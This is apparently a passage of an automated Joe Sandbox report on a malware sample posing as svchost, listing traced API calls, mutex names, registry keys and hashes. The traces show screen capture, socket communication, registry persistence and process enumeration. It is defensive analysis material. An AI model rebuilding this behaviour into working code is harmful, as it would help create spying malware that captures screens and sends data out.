                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2629017576-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(0264D21D), ref: 0264CAAF
                                                                                                                                                                                                              • GetWindowInfo.USER32(0264D21D,?), ref: 0264CAC9
                                                                                                                                                                                                              • GetClassLongA.USER32(0264D21D,000000E6), ref: 0264CB1E
                                                                                                                                                                                                              • PrintWindow.USER32(0264D21D,?,00000000), ref: 0264CB37
                                                                                                                                                                                                              • BitBlt.GDI32(0264CD02,?,?,?,?,753DBCB0,00000000,00000000,00CC0020), ref: 0264CBDE
                                                                                                                                                                                                                • Part of subcall function 0264DCE0: GetClassNameA.USER32(?,?,00000101), ref: 0264DCF6
                                                                                                                                                                                                                • Part of subcall function 0264C8D0: SendMessageA.USER32(00000000,?,00000004,00000000), ref: 0264C8F8
                                                                                                                                                                                                                • Part of subcall function 0264C8D0: GdiFlush.GDI32(00000000,?,0264C9F1,00000000,?), ref: 0264C90E
                                                                                                                                                                                                                • Part of subcall function 0264C8D0: BitBlt.GDI32(0264C9F1,00000000,00000000,?,0264C9F1,?,00000000,00000000,00CC0020), ref: 0264C934
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                              • String ID: <$@J=u
                                                                                                                                                                                                              • API String ID: 2334662925-1520792215
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • send.WS2_32(?,02689E44,00000002,00000000), ref: 02659A2A
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 02659A4E
                                                                                                                                                                                                              • recv.WS2_32(?,00000001,?,00000000), ref: 02659A7C
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000000), ref: 02659AA0
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 02659AC5
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(0268FCA8,00000001,?,00000000), ref: 02659AED
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(0268FBA0,?,?,00000000), ref: 02659AFF
                                                                                                                                                                                                              • send.WS2_32(?,02689E48,00000002,00000000), ref: 02659B0E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$lstrcmpsend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1090895577-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,02649F49,00000000,?,?,?,?,02649400,?,?), ref: 02649C41
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000000,00000000), ref: 02649C5F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02649F49,00000000,?,?,?,?,02649400,?,?), ref: 02649D2F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02649F49,00000000,?,?,?,?,02649400,?,?), ref: 02649D51
                                                                                                                                                                                                              • SendMessageA.USER32(?,0000E2AD,00000000,00000000), ref: 02649D98
                                                                                                                                                                                                              • SendMessageW.USER32(?,?,00000003,00000000), ref: 02649DBE
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,?,?), ref: 02649DCB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3783495248-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02645A60
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02645A8C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02645AB3
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02645AD4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000002C0,000003E8), ref: 02645B04
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(000002C0), ref: 02645B25
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02645B3E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2971961948-0
                                                                                                                                                                                                              • Opcode ID: 9a25f8a2105e8ab052312e8db63fa955bde2e7ea598140240b64449d6b085f9e
                                                                                                                                                                                                              • Instruction ID: 56a638674d4fd3dee625ce7b22934a50af98f843d47728d7bf654f6ade317eb9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a25f8a2105e8ab052312e8db63fa955bde2e7ea598140240b64449d6b085f9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3441E7B5D40208EFDB40DFA9D885AAEBBF5FB48311F95416AE905F7300EB709A41CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02645B68
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02645B99
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02645BC5
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02645BEC
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000002C0,000003E8), ref: 02645C1D
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(000002C0), ref: 02645C3E
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02645C48
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2971961948-0
                                                                                                                                                                                                              • Opcode ID: d18d09215e1fdc2903c6c21822c0a0cef003370f1b29e913a5b7c65b02861eef
                                                                                                                                                                                                              • Instruction ID: 641d7714a511d2be8f54710132117a69e592fcbc7540bcc7b9f6b64459c53752
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d18d09215e1fdc2903c6c21822c0a0cef003370f1b29e913a5b7c65b02861eef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A731F8B1E41208EFDB40DFE9D885AEDBBF5FB48710F50856AE519E7200EB705A418F90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0264BB8F
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0264BBBB
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0264BBE2
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 0264BC11
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,75775d6fa), ref: 0264BC27
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                              • String ID: 75775d6fa
                                                                                                                                                                                                              • API String ID: 410342393-3787332362
                                                                                                                                                                                                              • Opcode ID: 475ce88a204cf491446fbe0d41582200303bb4f531efa67da6411e197adcbfa0
                                                                                                                                                                                                              • Instruction ID: 5d72dbea06db2daba46518dc3d2a5a354635a4e20292d109c2b6b7a0c33a0194
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 475ce88a204cf491446fbe0d41582200303bb4f531efa67da6411e197adcbfa0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F31C7B1E4020DAFDB40CFA9D885AEEBBF4FB48715F50816AE509E7240E7749A45CF90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,76A8DB30), ref: 004015CF
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02664C14
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02664C1F
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 02664C45
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 02664C60
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 02664C6C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02664C88
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02664C9A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: b1fe802293670035df8a982b86978814d98946024a7da837b4d4cf8278da53d5
                                                                                                                                                                                                              • Instruction ID: 376948a5a157e08f4ef6f0162b3844c1d89bcdc1c0320ece496d2f3db0bbde62
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1fe802293670035df8a982b86978814d98946024a7da837b4d4cf8278da53d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0711C672505210ABD320DE65DC48AAFBBA9EF85360F408619FD5583380EB309555CBF2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02671314
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 0267131F
                                                                                                                                                                                                              • htonl.WS2_32(000000FF), ref: 0267132A
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 02671336
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 02671350
                                                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 02671363
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 0267136E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 298246419-0
                                                                                                                                                                                                              • Opcode ID: a93ca6649e2838d8230651e60d691408274ee7ea49943decfcd043b9435dac22
                                                                                                                                                                                                              • Instruction ID: d29ec076a3ad66472fde3857ae069d1451b2541623e13a7ed64d864b53c6115f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a93ca6649e2838d8230651e60d691408274ee7ea49943decfcd043b9435dac22
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57118431E40204AFDB009FA9DC44BAEB7B9FF45361F81876AF916E7390D77095508B61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,-80000001,?,?,?,?,?,?,0000001C,00000000), ref: 026518AD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(-80000001,7577588Da,00000000,00000001,?,00000104,?,?,?,?,0000001C,00000000), ref: 026518CF
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 026518DD
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 026518F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFlushOpenValue
                                                                                                                                                                                                              • String ID: 7577588Da$software\microsoft
                                                                                                                                                                                                              • API String ID: 2510291871-3005012126
                                                                                                                                                                                                              • Opcode ID: 917cc2182c75326f7657257de565fdd4098d87b877de41c9c0c9291b1a0e2090
                                                                                                                                                                                                              • Instruction ID: 63e09ce6499907fd920b2ec35988ef23f0bfb4df2ac7a3330cf3167252582683
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 917cc2182c75326f7657257de565fdd4098d87b877de41c9c0c9291b1a0e2090
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B11E374B00258ABEB24DBA0CCC8FEE3369EB45704F6045ACFA8AD7140D774DE848B50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0264D860,00000000,00000000,00000000), ref: 0264D8A4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02649D7A,?,?,?,?,02649F49,00000000,?,?,?,?,02649400), ref: 0264D8BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,02649D7A,?,?,?,?,02649F49,00000000,?,?,?,?,02649400,?), ref: 0264D8CD
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02649D7A,?,?,?,?,02649F49,00000000,?,?,?,?,02649400), ref: 0264D8DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264D910
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 0264D917
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 0264D92B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 731183410-0
                                                                                                                                                                                                              • Opcode ID: 7cbcd5e3f80f921f8a76fc6a401fcc84ba68b81c94996a4e13c2b9b97605fe07
                                                                                                                                                                                                              • Instruction ID: 60e56b8823b5a2b5ad8e6a4a35b2492b0bc0ea6f8e1b74c937594f0229c50eab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cbcd5e3f80f921f8a76fc6a401fcc84ba68b81c94996a4e13c2b9b97605fe07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1311A530E81214BBE7109F60DC0DFAE37E8AF09B14F555654F905AB2C1DBB459508B99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                              • API String ID: 4133869067-1576788796
                                                                                                                                                                                                              • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 0265990B
                                                                                                                                                                                                              • shutdown.WS2_32(026599EC,00000001), ref: 02659910
                                                                                                                                                                                                              • recv.WS2_32(026599EC,?,00000400,00000000), ref: 0265992F
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 02659945
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 02659959
                                                                                                                                                                                                              • closesocket.WS2_32(026599EC), ref: 0265995C
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 02659960
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1638183600-0
                                                                                                                                                                                                              • Opcode ID: f2e2364ca3ea94a92da0e5961804ec26bce16f5c72dc129816ae30b4d54dbcf3
                                                                                                                                                                                                              • Instruction ID: 799b81a161ad86b59e285d20fb9315a876144bc9835c53fe00ac4389573014f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2e2364ca3ea94a92da0e5961804ec26bce16f5c72dc129816ae30b4d54dbcf3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23F0A4B2990328BBDB209A64CC45F9F3B6CEB48750F055500BB09BB280D6B4B840CEE5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 0266193E
                                                                                                                                                                                                                • Part of subcall function 026659D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 026659EE
                                                                                                                                                                                                                • Part of subcall function 026659D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02645DE8,?,?,02645DE8,?,00000001), ref: 02665A0B
                                                                                                                                                                                                                • Part of subcall function 026659D0: SetNamedSecurityInfoA.ADVAPI32(?,02645DE8,00000010,00000000,00000000,00000000,00000001), ref: 02665A26
                                                                                                                                                                                                                • Part of subcall function 026659D0: LocalFree.KERNEL32(?,?,?,02645DE8,?,00000001), ref: 02665A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732},00000006), ref: 0266195B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02661962
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02661974
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02661985
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
                                                                                                                                                                                                              • API String ID: 1370207991-2011349651
                                                                                                                                                                                                              • Opcode ID: 7e42e38a139c25e3eea9b52333d8846c414cb61dce499e6324c3261244622fbd
                                                                                                                                                                                                              • Instruction ID: 4abde2507b5711e4a7aa8583bb37e02279a07f06387eedfe5a85794a1ed051fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e42e38a139c25e3eea9b52333d8846c414cb61dce499e6324c3261244622fbd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18F02E30DD2214B7E31067E19C0DB6F7BBC9F05B05F550B55FD0BA5380DBA05A5046E6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdiFlush.GDI32(00000000,?,00000000), ref: 026488B6
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 026488C4
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,?), ref: 026488DA
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(00000000,?), ref: 026488E6
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?), ref: 026488F3
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02648915
                                                                                                                                                                                                              Memory Dump Source
